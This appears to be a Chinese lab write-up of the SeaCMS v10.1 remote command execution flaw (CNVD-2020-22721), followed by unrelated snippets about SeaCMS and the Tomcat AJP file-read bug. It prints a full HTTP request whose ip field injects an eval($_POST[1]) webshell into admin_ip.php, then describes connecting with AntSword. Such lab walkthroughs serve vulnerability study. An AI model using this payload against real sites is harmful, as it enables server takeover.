seacms 远程命令执行 (CNVD-2020-22721)

seacms 远程命令执行 (CNVD-2020-22721)

漏洞简介:

海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。

环境搭建:

登录后台,账号admin,密码admin

访问后台IP安全设置网页 

 burp进行抓包,后面拼接一句话命名

POST /manager/admin_ip.php?action=set HTTP/1.1
Host: vulfocus.fofa.so:34208
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://vulfocus.fofa.so:34208
Connection: close
Referer: http://vulfocus.fofa.so:34208/manager/admin_ip.php
Cookie: Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1635834194,1635834251; grafana_session=4ed2fe8aecc214c9bbb634d8399014fb; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640670569; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%2229814a38-17f9-413d-ad48-e704ca23ede6%22; SECKEY_ABVK=dZF+HPOlvzzkwiS3ULsWzugVwqg4ArCvLrzLblcuidQ%3D; BMAP_SECKEY=a52c397851ec0df6cb484b1d2c453acc49624b58896cb16fca4c15a2a5a330f41d048e40401107e5d699a5592f90abea5c64379815179d8bc02cbfd533f1c2784e84874764b6b40a032b23dbff4e931ed7413db121a2b52266f9290f239991ecce81595bf8b1ec1c3add56d6d7a9d1b87690ec447ec7359de0c799eafbaff605e058b6494a4df2b0d9b55365d4e0a5a8f6b1e541f01e99cd55369bee3dcc7f4a4a21514067b0064068c73d6609ca9562f3eea532cb3189fee339388c1217e1fdb620b1964f6c11ca3bc11fae160521eb40ac6155a72d15662b7b3c6e5ac53dfd290aa578ccc9f7d85e6382bd04011d4a; PHPSESSID=vkm739qeu2gjd7a0cbbp4vf93k; eth0_time=1640854789; eth0_num=0; eth0=899.299; login_auto=YXs3g0Y%3D%7Ce8370432763aed411bfc6be43e5bc69e416f1d76
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1

v=0&ip=+1233123231";eval($_POST[1]);//

访问,无报错

 蚁剑进行连接

 获得后台shell

 漏洞修复:

根据官方进行升级或者下载补丁包

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
seacms海洋cms影视管理系统 v9.1 更新日志 更新日期:2019年2月1日 v9.1 优化:服务器开启OPcache时后台设置兼容性 优化:视频编辑时剧情分类显示方式 优化:剧情分类缓存项 seacms海洋影视管理系统简介 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。 seacms海洋影视管理系统前台页面 seacms海洋影视管理系统后台管理 后台路径:域名//admin 用户名与密码:admin(安装时可设置) 后台页面:  相关阅读 同类推荐:站长常用源码
cnvd-2020-10487-tomcat-ajp-lfi是一种利用Tomcat中Apache JServ协议(AJP)的本地文件包含(LFI)漏洞。该漏洞允许攻击者在服务器上执行任意的文件读取和执行操作,从而可能导致敏感信息泄露、甚至服务器完全受控。 攻击者可以通过将恶意的AJP请求发送到Tomcat服务器的8009端口来利用该漏洞。这些请求可以指定要读取的文件路径。由于Tomcat默认配置下AJP协议启用且未进行适当的安全限制,攻击者可以通过这个漏洞读取和执行服务器上的任意文件。 为了防止受到cnvd-2020-10487-tomcat-ajp-lfi漏洞的攻击,可以采取以下措施: 1. 禁用或限制AJPS协议的使用:可以通过修改Tomcat的配置文件来禁用或限制AJPS协议的使用。将AJP协议暴露在公共网络上可能会使服务器容易受到攻击。 2. 更新Tomcat版本:及时安装Tomcat的安全更新和补丁,以保持服务器的安全性和稳定性。 3. 配置Tomcat访问控制:通过配置Tomcat的访问控制策略,限制外部访问与敏感文件相关的路径。 4. 使用防火墙和入侵检测系统(IDS):配置防火墙和IDS以监控和检测异常的网络活动,并及时阻止和警示可疑的AJP请求。 5. 最小权限原则:确保服务器上的所有账户和进程都具有最小权限。这样,即使攻击者成功利用了漏洞,也能够最大限度地减小攻击的影响范围。 综上所述,cnvd-2020-10487-tomcat-ajp-lfi是一种危险的漏洞,但通过采取适当的防护措施,我们可以提高服务器的安全性,避免受到该漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值